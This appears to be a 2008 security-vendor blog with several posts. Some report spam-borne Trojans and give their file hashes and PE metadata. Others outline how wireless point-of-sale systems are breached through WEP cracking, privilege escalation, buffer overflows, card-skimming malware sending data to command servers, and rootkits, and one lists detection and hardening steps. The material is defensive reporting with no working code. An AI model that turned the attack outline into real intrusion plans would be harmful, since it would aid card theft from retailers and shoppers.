More Trojans hiding behind false celebrity videos

July 31, 2008

It appears that another spam campaign has surfaced with the intention of enticing users into opening messages with tag lines such as “Failure Notice” and “Your Order is Executed” or “Your Order”. However, when you look at the message body, it presents something entirely different such as “Angelina Jolie Nude” or “Jennifer Lopez Extremely Naked” all in the form of links that have Trojans hiding behind them. In the example below the link will download a false AVI codec.

Here is what was hiding behind this link at a Website.

http://www.virustotal.com/analisis/0bd3eb3d643f44c8fc3abf4e523260a2

File size: 110080 bytes
MD5…: 63aaec539c2066162245dbcd401ed6dd
SHA1..: 636c40e8a36b8c5148ebc155ab3507a46f9cc6b5
SHA256: 8c02faea017673b30952dbeb1f9f110cc9f7cb9a4521da5cf504c1e76c594086
SHA512: 9d7356685bc279e31d1f0cd2f51f07272b4cacb85935cab946dd1e0c7d5edbec
b1cb34090bad806b88eac7b464a317991aeb4f027f912a86c5dca80319411bdc
PEiD..: –
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x402f6e
timedatestamp…..: 0x48776b9b Fri Jul 11 14:18:03 2008
machinetype…….: 0x14c (I386)

( 4 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x8f11 0x6200 7.99 70e00ef0c033a7a2f9f7025e9c590555
.rdata 0xa000 0x349a 0x1600 7.96 c8dcec56969c9063de3ba6e0038af237
.data 0xe000 0x25ef1 0x11200 8.00 525568375d30a9d9d560c221352b5a82
.rsrc 0x34000 0x2000 0x2000 5.31 9f54e2e8faf7d9e69eefb0e1514d836a

( 3 imports )
> gdi32.dll: ResetDCW, StretchBlt, SetICMMode, SetRelAbs, SetDIBColorTable, UpdateColors, SaveDC, TextOutW
> urlmon.dll: URLOpenStreamA, IsLoggingEnabledA, CoInstall, GetClassFileOrMime, AsyncInstallDistributionUnit, IsValidURL
> shell32.dll: StrRChrIW, SHFormatDrive, SHAppBarMessage

( 0 exports )
 
ThreatExpert info: http://www.threatexpert.com/report.aspx?md5=63aaec539c2066162245dbcd401ed6dd

File size: 110080 bytes
MD5…: 63aaec539c2066162245dbcd401ed6dd
SHA1..: 636c40e8a36b8c5148ebc155ab3507a46f9cc6b5
SHA256: 8c02faea017673b30952dbeb1f9f110cc9f7cb9a4521da5cf504c1e76c594086
SHA512: 9d7356685bc279e31d1f0cd2f51f07272b4cacb85935cab946dd1e0c7d5edbec
b1cb34090bad806b88eac7b464a317991aeb4f027f912a86c5dca80319411bdc
PEiD..: –
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x402f6e
timedatestamp…..: 0x48776b9b Fri Jul 11 14:18:03 2008
machinetype…….: 0x14c (I386)

( 4 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x8f11 0x6200 7.99 70e00ef0c033a7a2f9f7025e9c590555
.rdata 0xa000 0x349a 0x1600 7.96 c8dcec56969c9063de3ba6e0038af237
.data 0xe000 0x25ef1 0x11200 8.00 525568375d30a9d9d560c221352b5a82
.rsrc 0x34000 0x2000 0x2000 5.31 9f54e2e8faf7d9e69eefb0e1514d836a

( 3 imports )
> gdi32.dll: ResetDCW, StretchBlt, SetICMMode, SetRelAbs, SetDIBColorTable, UpdateColors, SaveDC, TextOutW
> urlmon.dll: URLOpenStreamA, IsLoggingEnabledA, CoInstall, GetClassFileOrMime, AsyncInstallDistributionUnit, IsValidURL
> shell32.dll: StrRChrIW, SHFormatDrive, SHAppBarMessage

( 0 exports )
 
ThreatExpert info: http://www.threatexpert.com/report.aspx?md5=63aaec539c2066162245dbcd401ed6dd

File size: 110080 bytes
MD5…: 63aaec539c2066162245dbcd401ed6dd
SHA1..: 636c40e8a36b8c5148ebc155ab3507a46f9cc6b5
SHA256: 8c02faea017673b30952dbeb1f9f110cc9f7cb9a4521da5cf504c1e76c594086
SHA512: 9d7356685bc279e31d1f0cd2f51f07272b4cacb85935cab946dd1e0c7d5edbec
b1cb34090bad806b88eac7b464a317991aeb4f027f912a86c5dca80319411bdc
PEiD..: –
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x402f6e
timedatestamp…..: 0x48776b9b (Fri Jul 11 14:18:03 2008)
machinetype…….: 0x14c (I386)

( 4 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x8f11 0x6200 7.99 70e00ef0c033a7a2f9f7025e9c590555
.rdata 0xa000 0x349a 0x1600 7.96 c8dcec56969c9063de3ba6e0038af237
.data 0xe000 0x25ef1 0x11200 8.00 525568375d30a9d9d560c221352b5a82
.rsrc 0x34000 0x2000 0x2000 5.31 9f54e2e8faf7d9e69eefb0e1514d836a

( 3 imports )
> gdi32.dll: ResetDCW, StretchBlt, SetICMMode, SetRelAbs, SetDIBColorTable, UpdateColors, SaveDC, TextOutW
> urlmon.dll: URLOpenStreamA, IsLoggingEnabledA, CoInstall, GetClassFileOrMime, AsyncInstallDistributionUnit, IsValidURL
> shell32.dll: StrRChrIW, SHFormatDrive, SHAppBarMessage

( 0 exports )
 
ThreatExpert info: http://www.threatexpert.com/report.aspx?md5=63aaec539c2066162245dbcd401ed6dd

Advertisements

Angelina Jolie Spam

July 30, 2008

This morning I discovered a very interesting email in one of our spam sensors in the US. This message is claiming to show the viewer a nude video of Angelina Jolie. However, the link directs you to a website hosting a malicious Trojan.

http://www.virustotal.com/analisis/73bed1ec0c96beaa59fc9abb7f9ad01f

File size: 148992 bytes
MD5…: a7e316a7ebc0a90f1d278d63f500e79f
SHA1..: 454fa925c9c1de565e463b4763f8faee4376df94
SHA256: 1bdc9ff03f7910d24d86871d4ea9a3c1552862bfe2eaf26d2074b4098a249656
SHA512: 394d073de2bbddc427f618dc76566ceafc1df88aed296eca63a5f6e617c80327
2e87bea78a7a8288e17edac26ab1015719e258496a5a48df35c6bc654abf5fd8
PEiD..: –
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x401b4e
timedatestamp…..: 0x2a425e19 (Fri Jun 19 22:22:17 1992)
machinetype…….: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0x1000 0x29000 0x1000 5.40 f234efda261d13d094fdac23c9cdbdd2
.data 0x2a000 0x23000 0x22800 7.78 284c37f82871fbc931d83b2b56ef9a00
.idata 0x4d000 0x1000 0xa00 4.61 bb5a25aa473903b9f4c49879669f77ea

( 4 imports )
> KERNEL32.dll: WritePrivateProfileStringW, GetLastError, GetSystemTime, SetEndOfFile, CallNamedPipeA, SetConsoleTitleA, VirtualProtect, WriteFileEx, Process32FirstW, ReadConsoleOutputCharacterW, SetConsoleMode, OpenJobObjectA, FlushViewOfFile
> USER32.dll: SetCursor, SetLayeredWindowAttributes, WINNLSGetIMEHotkey, FindWindowExA, InSendMessage, SetCursorPos, WaitForInputIdle, GetClipboardFormatNameA, LoadCursorFromFileW, GetThreadDesktop, SetClipboardViewer, SetDeskWallpaper, SetProgmanWindow, IsDialogMessage, EndDeferWindowPos, ShowScrollBar, WCSToMBEx, LoadAcceleratorsA, UpdateLayeredWindow, RegisterWindowMessageW, ScrollWindowEx, GetDialogBaseUnits, ModifyMenuW, CheckDlgButton, CreateWindowExW, OpenWindowStationA, ToUnicode, BlockInput, wsprintfA, GetMouseMovePointsEx, SendMessageTimeoutA, GetLastInputInfo, DlgDirSelectExW, DdeQueryStringA, ClientToScreen, IsCharAlphaNumericA
> GDI32.dll: GetKerningPairsW, ExtTextOutW, XLATEOBJ_cGetPalette, CreateBitmap, GdiCreateLocalMetaFilePict, EngComputeGlyphSet, WidenPath, GetStringBitmapA, PolyTextOutA, ScaleWindowExtEx, FlattenPath, EngDeleteSurface, SelectClipRgn, SetMapperFlags, GetCurrentPositionEx, ExtCreatePen, CreatePalette
> COMDLG32.dll: PageSetupDlgW, WantArrows, ReplaceTextW, PrintDlgW, GetSaveFileNameA, GetOpenFileNameA, ChooseColorW, LoadAlterBitmap, PrintDlgExA, ChooseFontW
 


FBI v.s Facebook Spam

July 29, 2008

This morning I checked one of our mailboxes here in the US and discovered this very interesting spam message containing the subject line “F.B.I may strike facebook“. When I investigated further, the body of the message consisted of text such as: “F.B.I Facebook Records” with a link to a URL that appeared to be a daily news site.

When you visit the URL the site will automatically download an executable fbi_facebook.exe tricking the user into believing that the article is being viewed. However, the executable is not the so call article that they are mentioning here, but a Trojan.

http://www.virustotal.com/analisis/727ffdbca414ed259391a55bf0be5c78

File size: 93548 bytes
MD5…: fb1a39398efd85bafb22e9fc220077ce
SHA1..: 784a8b27bdcc1820282094a9be8691fee79ad73c
SHA256: 08c41c3109c5a1105f04151d6288b91520f8ad7e5058f326419704ed8edb5374
SHA512: 293c8a849b7c9b86dadf7ebbbc8661535a627ba0be6bc5f2fff9525ae3793790
c86d24e5391efa9330baa03b4050ff30b0171fe48998adb7d7c94d0f45c2cb94
PEiD..: –
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x405598
timedatestamp…..: 0x488e95e5 Tue Jul 29 04:00:37 2008
machinetype…….: 0x14c (I386)

( 5 sections )
name viradd virsiz rawdsiz ntrpy md5
.code 0x1000 0x4620 0x4800 7.88 227a121cd564fa93c0b3cb3b54ec349a
.rdata 0x6000 0x12f 0x200 7.61 38ed1ae64ec215e332eefb1d8a5ec253
.data 0x7000 0x820 0xa00 7.92 45dc9ac3dc99703c85bd9ff20e65b21c
.mdata 0x8000 0x10f10 0x11000 8.00 d88a0bf187575769c566908716507b7e
.CRT 0x19000 0x4 0x200 7.60 3e92819be4f67d671e12b3ae9b1f249e

 


Point-of-Sales Vulnerabilities

July 24, 2008

The Target: the wireless point-of-sale (POS)

The wireless POS system consists of one or more networked wireless POS end-points located at check-out stands and the internal on-site transaction server which connects the system to the payment authorization source. The transaction server also interfaces with the inventory control system.

• Transaction initiated at wireless POS checkout stand

• Transaction information sent to wireless access point, to transaction server, to authorization source

• Transaction authorization returns to POS checkout to complete transaction

Note there are vulnerabilities at each point.

 

From an architectural perspective a POS end-point runs an operating system, either a version of Windows or Linux designed to limit functionality – meaning not all O/S functions are available to the logged-in user. These devices are physically divided into two different components:

• Card Reader – system that reads the card as it is swiped.

• Transaction Unit – system that sends the card information to an authorization source.

The information read at the POS will be sent to an authorization source (e.g., Amex) through the transaction unit. In addition the transaction information of the purchase (payment, item, quantity, etc.) is sent over the network to a branch server for inventory control and auditing purposes.

Normally the information sent between the retailer and the authorization source will use strong encryption to protect the information; however, network security between the POS and the internal branch servers may or may not be encrypted and really depends on the configuration.

Assuming that the retailer does encrypt the information sent between the POS and the branch server, the real vulnerabilities then exist at the POS end-point, the wireless access point, and the branch server itself.

• Because a POS terminal reads the card information, performs the transactions and receives the authorization code, information may be stored for short periods either in flash, static ram or the hard-drive (e.g., a few hours until close of register, etc). Therefore, malware could be installed directly on the POS to intercept the transaction data as it is being sent to the authorization source or the internal branch server for storage.

• Branch servers are normally used to collect information from multiple POS terminals, thus, they often will be running a database of some form or another. A hacker wishing to obtain access to this information would have to compromise the server first, and then likely exploit database encryption vulnerabilities.

Because the target is often cardholder information, hackers are developing strategies that involve breaching wireless networks – mainly because a POS requires either direct physical access or access via the network, thus, it’s easier to penetrate than cracking the corporate firewall and obtaining access via the external gateway.

Penetrating a wireless network and planting targeted malware only recently emerged on the scene and is expected to increase; especially being that cardholder information is one of the primary targets of interest when it comes to data of value.

Once the intruder has accessed the wireless network the next challenge would be to compromise the POS or the Branch server. There are a number of ways and vectors in which this can be accomplished in a relatively short period of time:

• Privilege escalation: Elevating user privileges is a method that hackers use to gain access to other parts of the system that may require a higher level of validation. Vulnerabilities that allow this condition to occur are often the culprit behind most escalation attacks.

• Hacking specific Windows services (IIS, SQL, Apache, etc): Gaining access via Windows services by exploiting specific vulnerabilities that allow remote arbitrary code execution.

• Buffer overflow attacks: Overflowing the buffer of an application will cause a condition to occur, that in some cases will allow for arbitrary code to execute with remote shell binding capabilities. Many of these methods if done correctly and the systems are somewhat vulnerable, often will work.

One popular method being used today is the development of targeted malware to extract credit card information and other sensitive data directly from the wireless POS, AP, or the Branch server .

Some recent breaches have led to malware being physically installed on key servers and the avenue for attack was through a wireless network at a field office.

One theory on how this malware would work, is by capturing the details in real-time by installing Trojans that directly interact with the application on the POS terminal, thus, capturing the customer’s information in real-time as it is sent to the authorization source or the branch server.

Once the malware has captured the necessary data it can open a channel with a command and control server and upload the stolen information – it is often found that the C&C server will also be connected to thousands of compromised PCs; subsequently distributing the stolen data to be stored on a consumer’s PC. The chilling part is any consumer’s PC can instantly become a drop-box for stolen corporate information once it has been compromised by hackers.

Hiding the evidence

A next step for the attacker after compromising the POS would be to hide the obvious signs that the system had been tampered with, thus, installing a root-kit is one way to hide any traces associated with the attack. Full kernel mode persistent root-kits are the hardest form to detect.

Therefore, the hacker is completely eliminating the possibility of detection by the means of security scanners, anti-virus applications or any other security tool focused on finding vulnerabilities. This way the breach can remain hidden for as long as possible before anyone considers the possibility a POS is breached.


Anatomy of a Data Breach Part 3 – The Wireless Hack

July 17, 2008

Wireless networks and endpoints offer convenience and connectivity. Unless properly secured, they also offer a means of egress into the network. This article will describe the vulnerabilities and strategies for mitigation.

In the wake of undiscovered data breaches and subsequent public exposure, hackers have begun to turn their eye towards breaching wireless networks and taking advantage of the many weaknesses incumbent. Furthermore, we are seeing a trend towards stealing cardholder information from retailers such as TJ Max and Hannaford Brothers as a quick way to gain profit.

The use of mobile networks is not an uncommon way of providing access for employees anywhere anytime throughout the corporate campus. However wireless networks come with several often ignored dangers:

• Exploitation of WEP and WPA protocols.

• Impersonation and interception of wireless traffic.

• Access points being deployed with little or no security enabled.

All of these vulnerabilities can eventually lead to the exposure of private information if not properly secured and accounted for when implementing a data security policy. The weaknesses of a wireless environment can often lead to violations of PCI, HIPAA & SOX if an exposure were to occur through one of those vulnerabilities. Regulations such as SOX, HIPAA and PCI were ultimately designed to protect specific classes of information that if exposed can cause serious ramifications such as: fines, potential jail time and a host of other unwanted aftereffects.

The Target: Wireless Point-of-Sales (POS)

For example the protection of cardholder information as covered under PCI-DSS includes a number of guidelines to aide in the development of policy that (a) protects cardholder information stored on servers and (b) protects cardholder information that may be in transit via transactions that occur between front-end point-of-sales terminals, to backend merchant processing servers (the machines that handle and authorize transactions when a credit card is swiped at a store location).

 

Because the target is often cardholder information – meaning it has a higher raw value on the black-market then other information like a social security number, hackers are developing strategies that involve breaching wireless networks – mainly because it is much easier to penetrate then cracking the corporate firewall and obtaining access via the external gateway.

This is a stepping ground to harvesting data at rest, but in motion as well. The methodology behind this goes in tangent with the “low hanging fruit” theory and part of an overall emerging trend towards gaining access to cardholder information.

Cracking the Wireless Network

Wireless hacks attributed to around 9% of the security incidents documented in a recent report published by the Verizon Business Risk team. This is likely due to incorrectly configured access points or the use of weak authentication ; WPA-PSK in some cases can be vulnerable to offline dictionary attacks if given enough time to decode the captured traffic. WEP on the other hand can be cracked in less than 10 minutes using commercially available tools on the market.

For wireless hacks to be successful without investing a large amount of time and resources the access point either has to have a vulnerable encryption protocol enabled such as WEP or WPA-PSK or not have security enabled at all – which has been seen in the field numerous times.

As data security issues become the number one problem, hackers will continue to innovate and find additional ways of accessing the information they want. Penetrating a wireless network and planting targeted malware only recently emerged on the scene and is expected to increase; especially being that cardholder information is one of the primary targets of interest when it comes to data of value.

Thus, one popular method being used today is the development of targeted malware to intercept transmissions and to extract credit card information and other sensitive data directly from these streams .

However; it all starts with penetrating the wireless network and obtaining the ability to access its resources – as we have seen the weaker link in the chain is often targeted first (stores or regional offices in the field). Some recent breaches have led to malware being physically installed on key servers and the avenue for attack was through a wireless network at a field office.

Theories on how this malware would work would be using filters to detect certain packets with specific information (e.g. credit numbers, social security numbers, authorization codes and pin numbers all of which are of value). Another theory is capturing the details in real-time by installing Trojans that directly interact with the application on the POS terminal, thus, capturing the customer’s information in real-time as it exits the POS to the payment authorization gateway.

 

Once the malware has captured the necessary data it can open a channel with a command and control server and upload the stolen information – it is often found that the C&C server will also be connected to thousands of compromised PCs; subsequently distributing the stolen data to be stored on a consumer’s PC. The chilling part is any consumer’s PC can instantly become a drop-box for stolen corporate information once it has been compromised by hackers.

As mentioned before hackers will target wireless networks located at smaller regional offices as they did with Hannaford and TJX Max This is done under the assumption that security is weaker then at corporate HQ and fits part in parcel with them being “low hanging fruit”. This is probably true given the technical resources available and the diversity that smaller locations have.

Discovery and Prevention

Determining if you have been breached is somewhat difficult as the intruders have likely covered their initial entry by hiding any physical traces (deleting or hiding audit logs, etc). Therefore, your best approach is to adopt a strategy for detecting and mitigating the effects of a breach such as:

• Database monitoring: Technologies exist to monitor SQL and Oracle databases for suspicious activity (access from unauthorized users, insertion of scripts, execution of SQL statements, etc). Monitoring is only part of the equation to detecting an actual breach in progress. If hackers subsequently decide to access cardholder information stored in your databases in addition to extracting the data in real-time; database monitoring will increase the odds of discovering unauthorized access.

• Network Intrusion Detection: Intrusion detection technologies in addition to other methods can be used to detect anomalous traffic and behavior that might be associated with an attack.

• Hardening critical assets: You can minimize your exposure & risk by hardening critical assets (in this case the POS terminal); in other words you are removing non essential functionality such as services, applications and ports that not only adds to the complexity, but introduces additional risk.


PandaLabs Q2 Figures

July 7, 2008

Today we published our Q2 figures covering the most relevant trends in the malware landscape. Some of the key points from this Q2 report includes:

  • Distribution of Banker Trojan families by prevalence in the market.
  • Distribution of Active malware by country (this entails PCs with active malware running in memory).
  • Spam levels fluctuated between 60% to 94% of all email on the Internet

Banker Trojans continue to be a prominent factor when taking into consideration Identity Theft. As covered in the report Banker Trojans experienced a 400% increase as opposed to other years which were significantly less. In addition Russian Banker Trojans remain strong in terms of the overall distribution by family.

In the first half of Q2 2008 we saw an emergence of SQL Injection attacks being used to conduct mass hacking campaigns in order to distribute as much malware as possible. In conclusion cyber-crime only continues to evolve and should not be ignored when implementing security at your organization. The report can be found here:


Trojan to Worm Creator: A Camouflage?

July 1, 2008

Recently PandaLabs discovered a specialized tool for converting a Trojan to a Worm. Tools like these are not new and have been around for some time being made available in underground forums that are frequented by Script Kiddies and novice hackers.The danger with this specific kit is the ability to take a banker Trojan and make it a worm, almost instantly.

Hackers produce these malware building kits as a way to distract officials from clever and highly sophisticated targeted attacks against commercial entities. The more malware in the wild, the better as that creates a level of noise the anti-virus labs have to deal with.

Essentially the volume of new and unique malware has increased over the last year from simply being a few hundred thousand to that of a few million.